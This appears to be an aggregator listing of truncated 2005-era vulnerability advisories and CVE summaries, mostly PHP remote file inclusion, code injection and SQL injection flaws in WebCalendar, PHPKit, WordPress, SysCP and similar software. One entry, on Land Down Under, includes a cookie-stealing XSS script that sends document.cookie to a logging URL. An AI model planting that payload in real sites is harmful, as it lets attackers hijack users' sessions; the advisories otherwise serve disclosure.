CVE-2005-2717

PHP remote file inclusion vulnerability in WebCalendar before 1.0.1 allows remote attackers to execute arbitrary PHP code when opening settings.php, possibly via sendreminders.php or other scripts...

CVE-2005-2717

PHP remote file inclusion vulnerability in WebCalendar before 1.0.1 allows remote attackers to execute arbitrary PHP code when opening settings.php, possibly via sendreminders.php or other scripts...

Land Down Under

Bug finder:spyMASter Web site:Realhackers.net Contact:[email protected] LDU has some xss vulns Firstly you can use html codes in your signature you can get cookies with this put your signature that code SCRIPT location.href='http://site.com/log/ekle.php?c='+escapedocument. cookie/SCRIPT an...

AutoLinks Pro 'al_initialize.php alpath Parameter Remote File Inclusion

The remote host is running AutoLinks Pro, a commercial link management package. The version of AutoLinks Pro installed on the remote host allows attackers to control the 'alpath' parameter used when including PHP code in the 'alinitialize.php' script. By leveraging this flaw, an unauthenticated...

CVE-2005-2699

Unrestricted file upload vulnerability in admin/admin.php in PHPKit 1.6.1 allows remote authenticated administrators to execute arbitrary PHP code by uploading a .php file to the content/images/ directory using images.php. NOTE: if a PHPKit administrator must already have access to the end system...

CVE-2005-2685

SaveWebPortal 3.4 allows remote attackers to execute arbitrary PHP code via a direct request to admin/PhpMyExplorer/editerfichier.php, then editing the desired file to contain the PHP code, as demonstrated using header.php in the fichier parameter. NOTE: it is possible that this vulnerability ste...

CVE-2005-2687

PHP remote file inclusion vulnerability in SaveWebPortal 3.4 allows remote attackers to execute arbitrary PHP code via the 1 SITEPath parameter to menudx.php or 2 CONTENTSDir parameter to menusx.php...

phpkit161.txt

SQL Injection and PHP Code Injection Vulnerabilities in PHPKit 1.6.1 Version: PHPKit 1.6.1 Risk: High if magicquotesgpc = Off URL: http://www.phpkit.com SQL Injection in include.php?path=login/member.php The parameters usernick and letters are vulnerable to SQL Injections. POC:...

SQL Injection and PHP Code Injection Vulnerabilities in PHPKit 1.6.1

SQL Injection and PHP Code Injection Vulnerabilities in PHPKit 1.6.1 Version: PHPKit 1.6.1 Risk: High if magicquotesgpc = Off URL: http://www.phpkit.com SQL Injection in include.php?path=login/member.php The parameters usernick and letters are vulnerable to SQL Injections. POC:...

[SA16475] LiveSupport PEAR XML_RPC Nested XML Tags PHP Code Execution

---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...

CVE-2005-2612

The CVE covers a Direct code injection vulnerability in WordPress 1.5.1.3 and earlier that allows remote attackers to execute arbitrary PHP code via the cache_lastpostdate[server] cookie. Affected software is WordPress (versions prior to 1.5.1.3). Root cause is improper handling of the cache_last...

CVE-2005-2612

Direct code injection vulnerability in WordPress 1.5.1.3 and earlier allows remote attackers to execute arbitrary PHP code via the cachelastpostdateserver cookie...

CVE-2005-2612

Direct code injection vulnerability in WordPress 1.5.1.3 and earlier allows remote attackers to execute arbitrary PHP code via the cachelastpostdateserver cookie...

CVE-2005-2567

CVE-2005-2567 affects SysCP 1.2.10 and earlier. The vulnerability is a PHP remote file inclusion via the language parameter, enabling an attacker to execute arbitrary PHP code on the server. The issue is documented in the CVE entry and corroborated by related advisories; no explicit exploit detai...

CVE-2005-2571

FunkBoard 0.66CF (and possibly earlier) has an access-control flaw: the admin/mysql_install.php and admin/pg_install.php scripts are not properly restricted, allowing an attacker to obtain the database username and password or inject arbitrary PHP code into info.php. The issue is described as a l...

CVE-2005-2568

Eval injection vulnerability in the template engine for SysCP 1.2.10 and earlier allows remote attackers to execute arbitrary PHP code via a string containing the code within "" and "" curly bracket characters, which are processed by the PHP eval function...

CVE-2005-2568

Eval injection vulnerability in the template engine for SysCP 1.2.10 and earlier allows remote attackers to execute arbitrary PHP code via a string containing the code within "" and "" curly bracket characters, which are processed by the PHP eval function...

CVE-2005-2567

PHP remote file inclusion vulnerability in SysCP 1.2.10 and earlier allows remote attackers to execute arbitrary PHP code via the language parameter...

CVE-2005-2571

FunkBoard 0.66CF, and possibly earlier versions, does not properly restrict access to the 1 admin/mysqlinstall.php and 2 admin/pginstall.php scripts, which allows attackers to obtain the database username and password or inject arbitrary PHP code into info.php...

[Full-disclosure] [DRUPAL-SA-2005-004] Drupal 4.6.3 / 4.5.5 fixes critical XML-RPC issue

---------------------------------------------------------------------------- Drupal security advisory DRUPAL-SA-2005-004 ---------------------------------------------------------------------------- Advisory ID: DRUPAL-SA-2005-004 Date: 2005-aug-15 CVE ID: CAN-2005-2498 Security risk: highly...